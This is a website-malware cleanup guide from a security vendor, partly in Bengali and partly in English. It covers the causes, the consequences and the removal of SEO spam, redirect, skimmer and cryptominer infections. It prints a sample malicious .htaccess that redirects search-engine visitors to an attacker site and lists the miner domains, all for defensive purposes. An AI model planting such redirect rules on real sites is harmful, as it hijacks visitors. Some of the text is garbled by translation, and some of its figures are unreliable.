কম্পিউটার

ওয়েবসাইট ম্যালওয়্যার আক্রমণের বিশদ নির্দেশিকা:কারণ, ফলাফল এবং সমাধানের পদক্ষেপ

ম্যালওয়্যার আক্রমণ খারাপ! তারা আপনার ব্যবসাকে স্থির অবস্থায় নিয়ে আসে এবং অর্থ, খ্যাতি এবং এমনকি গ্রাহকদেরও ক্ষতি করে। সাধারণত ব্যবসার মালিকরা ম্যালওয়্যার দ্বারা সংক্রামিত হওয়ার পরেই এটি সম্পর্কে যত্ন নেওয়া শুরু করে। যেমন তারা বলে যে তারা হ্যাক না হওয়া পর্যন্ত প্রত্যেকে নিরাপদ বোধ করে, এবং তারা এখন পর্যন্ত হ্যাক হয়নি কারণ একজন হ্যাকার চেষ্টা করেনি। একবার সংক্রমিত হলে, ম্যালওয়্যার নামক এই জগাখিচুড়িটি ঠিক করার কারণ, ফলাফল এবং পদক্ষেপগুলি বোঝা অপরিহার্য হয়ে ওঠে। এখানে একটি লেখা রয়েছে যা আপনাকে কারণগুলি বুঝতে সাহায্য করবে এবং ম্যালওয়্যারের বিরুদ্ধে লড়াই করতে এবং এর দ্বারা সৃষ্ট জগাখিচুড়ি পরিষ্কার করতে আপনাকে গাইড করবে৷

ম্যালওয়্যার আক্রমণের শীর্ষ 5টি কারণ:

  • ভালনারেবল ওয়েবসাইট কোড: ভালো পণ্য যেমন আপনার ওয়েবসাইটে দর্শকদের আকর্ষণ করে, তেমনি খারাপ কোড হ্যাকারদের আকর্ষণ করে। অনেক সময় আপনার ওয়েবসাইটের কোডে অবহেলিত ফাংশন থাকে যা কিছু আক্রমণের জন্য ঝুঁকিপূর্ণ বলে পরিচিত। হ্যাকাররা প্রায়শই ওয়েবে এই ধরনের ফাংশনগুলি অনুসন্ধান করে এবং যেহেতু আপনার ওয়েবসাইটে সেগুলি রয়েছে, তাই এটি স্বয়ংক্রিয়ভাবে হ্যাকারদের রাডারের অধীনে চলে যায়। এখানে একটি অবচিত ফাংশনের একটি উদাহরণ যে হ্যাকাররা অনুসন্ধান করে:
    [code inline=”true” scrollable="true”]সাইট:WPSEO 1.5.0 সংস্করণ থেকে wpseo get_value বাতিল করা হয়েছে[/code]এবং ফলস্বরূপ, আপনি সমস্ত ওয়েবসাইট দেখতে পাচ্ছেন যে এই অবনমিত ফাংশনটি ব্যবহার করছে:
ওয়েবসাইট ম্যালওয়্যার আক্রমণের বিশদ নির্দেশিকা:কারণ, ফলাফল এবং সমাধানের পদক্ষেপ
  • আন-প্যাচড দুর্বলতা: ওয়ার্ডপ্রেস, ওপেনকার্ট, ম্যাজেন্টো, ড্রুপাল, জুমলা ইত্যাদির মতো সিএমএস-এর মধ্যে গুরুতর দুর্বলতা আবিষ্কৃত হয়েছে। এই দুর্বলতাগুলি এই CMS ব্যবহার করে লক্ষ লক্ষ ওয়েবসাইটকে আক্রমণের ঝুঁকিতে ফেলে দেয়৷ সময়ের সাথে সাথে এই সিএমএসগুলি বিকশিত হয়েছে, সুরক্ষার স্তরও আরও ভাল হয়েছে। কিন্তু তারপরে এই সিএমএসগুলি ব্যবহার করে হাজার হাজার প্লাগ-ইন/এক্সটেনশন রয়েছে যা হ্যাকারদের জন্য একটি সহজ এন্ট্রি পয়েন্ট হিসাবে প্রমাণিত হয়। 2016 সালের বিতর্কিত পানামা পেপারস ফাঁসটি লক্ষ লক্ষ ওয়ার্ডপ্রেস ওয়েবসাইট দ্বারা ব্যবহৃত বিখ্যাত বিপ্লব স্লাইডার প্লাগ-ইনের দুর্বলতার কারণে হয়েছিল।
    ওয়েবসাইট ম্যালওয়্যার আক্রমণের বিশদ নির্দেশিকা:কারণ, ফলাফল এবং সমাধানের পদক্ষেপ
  • ইনপুট স্যানিটাইজেশনের অভাব: একটি ওয়েবসাইটের একাধিক ফর্ম রয়েছে যেমন সার্চ বার, লগইন এলাকা, রেজিস্ট্রেশন ফর্ম ইত্যাদি৷ যদি এই ফর্মগুলিতে ব্যবহারকারীর দ্বারা নেওয়া ইনপুটগুলি স্যানিটাইজ না হয় তবে তারা প্রায়শই হ্যাকারকে খারাপ কোড যুক্ত করার অনুমতি দেয়৷ এটি অনেক কিছু না করে ওয়েবসাইটে প্রবেশ করার একটি সহজ উপায়। XSS এবং SQL ইনজেকশনের মতো আক্রমণগুলি ইনপুট স্যানিটাইজেশনের অভাবের সরাসরি পরিণতি। সম্প্রতি, জুমলা এক বছরের পুরনো LDAP দুর্বলতা প্যাচ করেছে! দীর্ঘ 8 বছর ধরে হ্যাকারদের দ্বারা দুর্বলতাটি কাজে লাগানো হচ্ছিল এবং এই দুর্বলতার কারণ ছিল ইনপুট ক্ষেত্রে স্যানিটাইজেশনের অভাব৷
  • সার্ভার লেভেল সিকিউরিটি লিকস: CMS বা ওয়েবসাইটের কোড ফাঁসের চেয়ে কম, কিন্তু সার্ভারগুলিও প্রায়শই ম্যালওয়্যার আক্রমণের কারণ হয়ে ওঠে। এবং যখন সার্ভার আক্রমণ করা হয় তখন সংক্রামিত ওয়েবসাইটের সংখ্যা সাধারণত মাত্র একটি আক্রমণে কয়েক হাজারে চলে। Apache, Nginx, Azure, Tomcat সকলেরই দুর্বলতা রয়েছে বলে জানা গেছে। সম্প্রতি ইকুইফ্যাক্স, 800 মিলিয়নেরও বেশি গ্রাহকের তথ্যের সমষ্টিগত তথ্য হ্যাক করা হয়েছে। হ্যাকের কারণ বলা হয়েছিল ওয়েব সার্ভারে একটি দুর্বলতা। ওয়েবসাইট ম্যালওয়্যার আক্রমণের বিশদ নির্দেশিকা:কারণ, ফলাফল এবং সমাধানের পদক্ষেপ
  • ওয়েবসাইটে কোনো ফায়ারওয়াল নেই: সমস্ত নিরাপত্তা সর্বোত্তম অনুশীলন থাকার পরেও ওয়েবসাইটগুলি ম্যালওয়্যার দ্বারা সংক্রামিত হয়৷ সুরক্ষার একটি অতিরিক্ত স্তর থাকা গুরুত্বপূর্ণ যা আমাদের আপনার ওয়েবসাইট 24×7 খুঁজছে। একটি ওয়েবসাইট ফায়ারওয়াল নিশ্চিত করে যে শুধুমাত্র বৈধ ট্র্যাফিক আপনার ওয়েবসাইটে পৌঁছায় এবং দূষিত বট/হ্যাকাররা দরজায়ই বন্ধ হয়ে যায়। নীচের স্ক্রীনটি দেখে Astra এর গ্রাহকরা কতটা স্বস্তি বোধ করেন তা এখানে:ওয়েবসাইট ম্যালওয়্যার আক্রমণের বিশদ নির্দেশিকা:কারণ, ফলাফল এবং সমাধানের পদক্ষেপ

যদিও উপরে উল্লিখিতগুলি ওয়েবসাইটগুলিতে ম্যালওয়্যার আক্রমণের জন্য সবচেয়ে সাধারণ কারণ, কারণগুলি উপরেরগুলির মধ্যে সীমাবদ্ধ নয়৷ এখানে একটি দ্রুত চেকলিস্ট রয়েছে যা আপনি নিশ্চিত করতে অনুসরণ করতে পারেন যে আপনার ওয়েবসাইট ম্যালওয়্যারকে আকর্ষণ করে না:

ওয়েবসাইট ম্যালওয়্যার সুরক্ষা চেকলিস্ট

ওয়েবসাইট ম্যালওয়্যার আক্রমণের বিশদ নির্দেশিকা:কারণ, ফলাফল এবং সমাধানের পদক্ষেপ

কোডে কোন অবচিত ফাংশন নেই

ওয়েবসাইট ম্যালওয়্যার আক্রমণের বিশদ নির্দেশিকা:কারণ, ফলাফল এবং সমাধানের পদক্ষেপ

সমস্ত ইনপুট স্যানিটাইজড

ওয়েবসাইট ম্যালওয়্যার আক্রমণের বিশদ নির্দেশিকা:কারণ, ফলাফল এবং সমাধানের পদক্ষেপ

FTP নয় কিন্তু SFTP

ওয়েবসাইট ম্যালওয়্যার আক্রমণের বিশদ নির্দেশিকা:কারণ, ফলাফল এবং সমাধানের পদক্ষেপ

দুর্বল SSH সংস্করণ ব্যবহারে নেই

ওয়েবসাইট ম্যালওয়্যার আক্রমণের বিশদ নির্দেশিকা:কারণ, ফলাফল এবং সমাধানের পদক্ষেপ

জায়গায় ওয়েবসাইট ফায়ারওয়াল

ওয়েবসাইট ম্যালওয়্যার আক্রমণের বিশদ নির্দেশিকা:কারণ, ফলাফল এবং সমাধানের পদক্ষেপ

সমস্ত প্লাগ-ইন আপডেট

ওয়েবসাইট ম্যালওয়্যার আক্রমণের বিশদ নির্দেশিকা:কারণ, ফলাফল এবং সমাধানের পদক্ষেপ

সর্বশেষ CMS সংস্করণ চলছে

ওয়েবসাইট ম্যালওয়্যার আক্রমণের বিশদ নির্দেশিকা:কারণ, ফলাফল এবং সমাধানের পদক্ষেপ

শক্তিশালী cPanel শংসাপত্র

ওয়েবসাইট ম্যালওয়্যার আক্রমণের বিশদ নির্দেশিকা:কারণ, ফলাফল এবং সমাধানের পদক্ষেপ

Google ওয়েবমাস্টারে কোনো সতর্কতা নেই

ম্যালওয়্যার আক্রমণের পিছনে হ্যাকারদের বিভিন্ন অনুপ্রেরণা থাকতে পারে। তাদের অনুপ্রেরণার উপর নির্ভর করে, আক্রমণের ধরন এবং আপনার ওয়েবসাইটের ফলাফলগুলি আলাদা। কখনও কখনও হ্যাকাররা অর্থের জন্য এতে থাকে বা কখনও কখনও তাদের আরও বেশি এজেন্ডা থাকে যেমন একটি বড় আক্রমণ শুরু করার জন্য ওয়েব সার্ভার সংস্থান ব্যবহার করা। ম্যালওয়্যার আক্রমণের কয়েকটি ফলাফল নীচে তালিকাভুক্ত করা হয়েছে

ম্যালওয়্যার আক্রমণের পরিণতি [ইনফোগ্রাফ]

  1. সংবেদনশীল ডেটার ক্ষতি
  2. পরিষেবার ব্যাঘাত
  3. সার্ভার সম্পদের ক্ষতিকারক ব্যবহার
  4. SEO বিষক্রিয়া
  5. শেষ-ব্যবহারকারীদের উপর লক্ষ্যযুক্ত আক্রমণ শুরু করা হচ্ছে

ম্যালওয়্যার আক্রমণের আরও পরিণতি নীচের ইনফোগ্রাফে বর্ণনা করা হয়েছে:

ওয়েবসাইট ম্যালওয়্যার আক্রমণের বিশদ নির্দেশিকা:কারণ, ফলাফল এবং সমাধানের পদক্ষেপ

কখনও কখনও ম্যালওয়্যার এখনও আপনার ওয়েবসাইটে প্রবেশ করে যদিও আপনি সমস্ত নিরাপত্তা সর্বোত্তম অনুশীলনের যত্ন নেন৷ শূন্য-দিনের জন্য ধন্যবাদ! আপনার ওয়েবসাইট ম্যালওয়্যার দ্বারা সংক্রামিত হলে, আক্রমণের ঠিক পরে এবং দ্রুত করা কিছু জিনিস আপনাকে প্রভাবকে কম রাখতে সাহায্য করতে পারে। ম্যালওয়্যার আক্রমণের পর সময় বাড়ার সাথে সাথে প্রতিক্রিয়ার আকারও বৃদ্ধি পায়। আপনি চান না যে আরও গ্রাহকরা সংক্রামিত হোক বা সংক্রামিত কোড সহ আপনার ওয়েবসাইট সূচীতে গুগল করুক। যদি google কোনো ওয়েবসাইটকে ইনডেক্স করে যখন ওয়েবসাইটের ম্যালওয়্যার থাকে, তাহলে এটি ওয়েবসাইটটিকে ফ্ল্যাগ করে এবং SEO প্রচেষ্টায় উল্লেখযোগ্য হ্রাস পায়।

ওয়েবসাইট ম্যালওয়্যার আক্রমণের বিশদ নির্দেশিকা:কারণ, ফলাফল এবং সমাধানের পদক্ষেপ

ম্যালওয়্যার দ্বারা আক্রান্ত একটি ওয়েবসাইট ঠিক করার পদক্ষেপগুলি

  • আপনার অনুসন্ধানের ফলাফল দেখুন: অনুসন্ধানের ফলাফলগুলি আপনাকে সংক্রমণের মাত্রা নির্ধারণ করতে সাহায্য করে এবং সেইসাথে কোন ধরনের ম্যালওয়্যার এর কারণ হতে পারে। কিছু পরিচিত ম্যালওয়্যার রয়েছে যা আপনার ওয়েবসাইটে ফার্মাসি পণ্যের লিঙ্ক তৈরি করে, বা বিখ্যাত জাপানি স্প্যাম আপনার SEO প্রচেষ্টাকে পুঁজি করার চেষ্টা করছে। গুগলে নিম্নলিখিত কোডটি প্রবেশ করালে প্রায়শই এই ধরণের আক্রমণগুলি নির্ধারণ করতে সহায়তা করে:
    [কোড ইনলাইন="সত্য" স্ক্রোলযোগ্য="সত্য"]সাইট:YourWebsite.com[/code]যদি আপনার ওয়েবসাইট জাপানি স্প্যামের মতো কিছু দ্বারা সংক্রমিত হয়, তাহলে আপনি নিম্নলিখিত পৃষ্ঠাটি দেখতে পাবেন:ওয়েবসাইট ম্যালওয়্যার আক্রমণের বিশদ নির্দেশিকা:কারণ, ফলাফল এবং সমাধানের পদক্ষেপ
  • . htaccess পরীক্ষা করুন: হ্যাকাররা সাধারণত সার্ভারের htaccess ফাইলে URL রিডাইরেক্ট কোড যোগ করে। এসইও স্প্যাম সংক্রমণের ক্ষেত্রে এই কোডগুলি সাধারণ যেখানে হ্যাকাররা। উপরন্তু, তারা Google ওয়েবমাস্টারে আপনার ওয়েবসাইট হাইজ্যাক করে এবং এর জন্য তারা সাধারণত htaccess ফাইলে কিছু কোড যোগ করে। আপনি যদি কোনো দূষিত কোড খুঁজে পান, এটি অবিলম্বে সরানো উচিত। এখানে একটি দূষিত .htaccess ফাইল দেখতে কেমন হয়:
    RewriteEngine On
    ErrorDocument 404 https://some-maliciousSite.com/yyy.php[*]
    
    * Note. The file name/type could be anything
    
    RewriteCond %{HTTP_REFERER} .google. [OR]
    RewriteCond %{HTTP_REFERER} .ask. [OR]
    RewriteCond %{HTTP_REFERER} .yahoo. [OR]
    RewriteCond %{HTTP_REFERER} .bing. [OR]
    RewriteCond %{HTTP_REFERER} .dogpile. [OR]
    RewriteCond %{HTTP_REFERER} .facebook. [OR]
    RewriteCond %{HTTP_REFERER} .twitter. [OR]
    RewriteCond %{HTTP_REFERER} .blog. [OR]
    RewriteCond %{HTTP_COOKIE} !^._yyyy=yyyyy.$ (*** Present in some hacks)
    RewriteCond %{HTTP_USER_AGENT} .Windows.$ [NC] (*** Present in some hacks)
    RewriteRule ^(.*)$ https://some-maliciousSite.com/yyy.php [R=301,L]
  • ইনডেক্স ফাইলের সত্যতা যাচাই করুন: হ্যাকাররা প্রায়ই সূচী ফাইলে তাদের দূষিত ফাইলগুলির পথ অন্তর্ভুক্ত করে। এইভাবে তাদের দূষিত ফাইল ওয়েবসাইট জুড়ে অন্তর্ভুক্ত করা হয়. প্রায়শই ইনডেক্স ফাইলে ক্ষতিকারক কোড শনাক্ত করা কঠিন কারণ এটি দেখতে খুবই বৈধ, যেন আপনার ডেভেলপার অন্য একটি ফাইল ইনডেক্স ফাইলে অন্তর্ভুক্ত করেছে। কিন্তু একটি বিশদ পরিদর্শনে একজন দেখতে পাবে যে সূচীতে অন্তর্ভুক্ত ফাইলগুলি দূষিত কোড।

ওয়েবসাইট ম্যালওয়্যার আক্রমণের বিশদ নির্দেশিকা:কারণ, ফলাফল এবং সমাধানের পদক্ষেপ
  • ওয়েবমাস্টারদের ক্লু আছে: Google ক্রমাগত ওয়েবসাইটগুলি স্ক্যান করে এবং প্রায়শই সঠিক পৃষ্ঠাগুলিকে পিন-পয়েন্ট করতে সক্ষম হয় যেখানে ম্যালওয়্যার ইনজেক্ট করা হয়েছে৷ এই তথ্যগুলি ওয়েবমাস্টারদের 'নিরাপত্তা সমস্যা' ট্যাবে পাওয়া যাবে। Once you see the URLs, it’s advised to go to ‘crawl’ tab and click on ‘fetch as google’ . After fetching the URLs as google, you can see the infected part highlighted by google in the code.
    ওয়েবসাইট ম্যালওয়্যার আক্রমণের বিশদ নির্দেশিকা:কারণ, ফলাফল এবং সমাধানের পদক্ষেপ
  • Japanese SEO Spam:Steps to Find &Fix

    If searching for your website on Google throws Japanese characters, then chances are that you’ve been infected with Japanese SEO spam. The interesting thing about this spam is that after you’ve taken care of bad code in index.php or htaccess, still the infection persists. This is because there are no specific traits of this malware. For every CMS, this malware is injected in a different way.

    ওয়েবসাইট ম্যালওয়্যার আক্রমণের বিশদ নির্দেশিকা:কারণ, ফলাফল এবং সমাধানের পদক্ষেপ

    The interesting part is that is you go to the URLs indexed by Google, you’ll find that those pages do not exist on your website. A 404 error would be thrown to anyone who goes to those pages. But when a search engine indexes these pages, Japanese characters would shown up. This is a classic example of cloaking attacking aimed at capitalizing on your SEO rankings.

    Find more about steps to fix this spam in a detailed guide on fixing Japanese spam or you could always contact us if you want our experts to help you here.

    ওয়েবসাইট ম্যালওয়্যার আক্রমণের বিশদ নির্দেশিকা:কারণ, ফলাফল এবং সমাধানের পদক্ষেপ

    How to Remove Pub2srv &Mobisla Website Infection

    আমরা বেশ কয়েক মাস ধরে ওপেনকার্ট এবং ওয়ার্ডপ্রেস ওয়েবসাইটগুলিকে লক্ষ্য করে একটি নির্দিষ্ট ম্যালওয়্যার সংক্রমণ দেখছি। It’s commonly referred to as the pub2srv malware infection which redirects your website visitors to other malicious domains like go.pub2srv.com , go.mobisla.com and go.oclaserver.com.

    ওয়েবসাইট ম্যালওয়্যার আক্রমণের বিশদ নির্দেশিকা:কারণ, ফলাফল এবং সমাধানের পদক্ষেপ

    If you use WordPress , the key areas to look for Pub2srv, Mobisls &Oclaserver malware are:

    • index.php
    • functions.php
    • ডাটাবেস টেবিল
    • Read about detailed steps here

    If you use OpenCart , then be sure to check:

    • oc_product_description table
    • oc_category_description table
    • A step by step procedure can be found in this guide

    Here is a detailed step by step guide to fix Pub2srv, Mobisla and Oclaserver malware.

    Website Links Redirecting to Spammy Websites

    This is the most disturbing of all the infections. Depending on the extend till your website is infected this one gets bad if not taken care of early. Any visitor entering your website is redirected to a malicious website or phishing page. Here’s an example video:

    Looking for malicious code in your index.php, searching for unwanted php files in core CMS files and checking your webmasters search console are the key things here. A more elaborate guide on how to deal with redirection issue can be found here.

    3 Most Common Malware Infections in OpenCart &Magento

    1. Base64 Encoded Malicious Code: If you see files containing cryptic pieces of code which look something like the image below, chances are you’ve been infected with this malware. We usually encounter this infection which hackers are trying to target payment gateways of a Magento, OpenCart of WordPress store.

    ওয়েবসাইট ম্যালওয়্যার আক্রমণের বিশদ নির্দেশিকা:কারণ, ফলাফল এবং সমাধানের পদক্ষেপ
  • The Database Infection: capitalize on your SEOWhen hackers want to cloak URLs of your website and , they choose to infect the database. Product descriptions and categories are filled with encoded pieces of malicious code.
  • The Deadly Backdoor: More than malware, backdoor is to ensure that hackers are able to re-infect your website even if clean some files up. It’s difficult to locate backdoors as hackers hide them at subtle areas difficult to locate.
  • More about all these infections and how to fix them can be found at our detailed guide here

    How to Prevent OpenCart Malware Injection

    OpenCart being the popular e-commerce CMS is often targeted by hackers, bots and scammers. Usually the aim is to steal end customers’ credit card information. We’ve seen multiple reasons for OpenCart infections depending on the version you are using. A few top reasons include:

    1. OpenCart Version Has Never Been Updated
    2. Plugins With Weak Security Practices
    3. No Website Firewall or Bad Bot Protection
    4. Unrestricted File Uploads &Unsanitized User Inputs

    We’ve made a detailed guide which explains how OpenCart malware be prevented.

    Tackling Magento &OpenCart Credit Card Malware

    Credit Card malware or Credit Card Hijack is when malicious PHP/JavaScript code is injected into Magento and OpenCart shops which allows hackers to intercept credit card data. This new way of credit card fraud has been undetected for 6 months.

    With the increasing popularity of e-commerce platforms like Magento and OpenCart, the cases of malware infections have also risen. Hackers and cyber criminals have been modifying the core files of these CMSs to steal the credit card information of store customers. Here’s a detailed guide on how to locate this malware and fix it.

    How to Fix Google Cross Site Malware Warnings?

    Google often flags websites marking them with a ‘Cross Site Malware’ warning. Usually this warning is caused when your website is linking content or loading libraries from a another domain that has malware or is malicious in nature. Google usually tells the domain from where the questionable content might be getting linked.

    ওয়েবসাইট ম্যালওয়্যার আক্রমণের বিশদ নির্দেশিকা:কারণ, ফলাফল এবং সমাধানের পদক্ষেপ

    The immediate steps to fix this should be to search your website’s entire code for the domain/URL which is causing cross site malware warning. You can do that by running this command in your SSH console:

    Here /var/www should be the path of the home directory of your website. And URL should be replaced with the domain that is causing the cross site malware problem according to Google.

    More details about the fix can be found here.

    How to Remove Crypto Mining Malware Infecting WordPress, OpenCart, Magento Websites?

    With the rise of crypto currencies &their power of making people rich within days – hackers have now started to target websites to infect them with crypto mining malware. Hackers use CoinHive, a service that is used as an alternative for advertisements by website owners to monetize traffic on their website.

    CoinHive installs as javascript on the website and mines crypto currencies using Monero blockchain. While if a website owner is knowingly using CoinHive as a mean to monetize their traffic it’s not a problem. But hackers use CoinHive to illegally install the mining Javascript on hacked websites and use their resources to mine coins. A few domains which are usually used include:

    • ads.locationforexpert[.]com
    • camillesanz[.]com/lib/status.js
    • security.fblaster[.]com
    • fricangrey[.]top/redirect_base/redirect.js
    • alemoney[.]xyz/js/stat.js
    • africangirl[.]top/redirect_base/redirect.js

    More details on finding this malware &fixing it can be found in our detailed guide here.

    WordPress &Joomla Websites Slow Down – Cloki Malware Could be the Cause

    Cloki malware is quite a dangerous malware that has been causing a havoc among various PHP based websites. The top CMSs infected are WordPress &Joomla. A few symptoms of Cloki malware are:

    • Slowing down of the website
    • Message from hosting provider about website utilizing too many resourcers
    • Presence of unidentified cron jobs on the server
    • Mail servers not working properly

    Cloke malware is able to execute core server commands without having access to cPanel or SSH. A malware scan followed by carefully reviewing of all the cron jobs is recommended.

    Details on how to fix the Cloki malware can be found in our detailed guide to remove the Cloki malware.

    উপসংহার

    We clean hundreds of website from malware every month. In all these websites 80% of the times the malware has infected the website atleast 2-months before the owner comes to us . Imagine since when the vulnerabilities causing the attack would have been around, all unpatched. It is important to make sure you update all your plug-ins, stay updated with security trends around your website’s tech stack and be proactive in implementing the patches just as they are released.

    After working with a number of website owners, we have realized that a business owner has so much to take care of right from sales, SEO, marketing, inventory etc. that often security takes a back seat . And then security looks like this elephant in the room that you do not want to address.

    Our website firewall takes the headache of security away from the business owners, giving them a plug-n-play solution which comes pre-configured according to the CMS they are using. Astra requires no coding or IT knowledge and takes 5-minutes to install. Making security that simple and giving you time to concentrate on sales, marketing and other things.

    Here’s what to do next…

    If you want us to help you fix your malware infected website within a few hours:contact us If you are a developer, download our secure coding checklist , which is free to download.
    1. কিভাবে একটি হ্যাক করা ওয়েবসাইট মেরামত করবেন? একটি হ্যাক করা ওয়েবসাইট

    2. সাইটগ্রাউন্ড অ্যাকাউন্ট সাসপেনশন কী এবং কীভাবে এটি ঠিক করবেন?

    3. সিমফনি ওয়েবসাইট হ্যাক - লক্ষণ, কারণ ও সমাধান

    4. কিভাবে ওয়ার্ডপ্রেসে পুশ নোটিফিকেশন এবং রিডাইরেকশন ম্যালওয়্যার ঠিক করবেন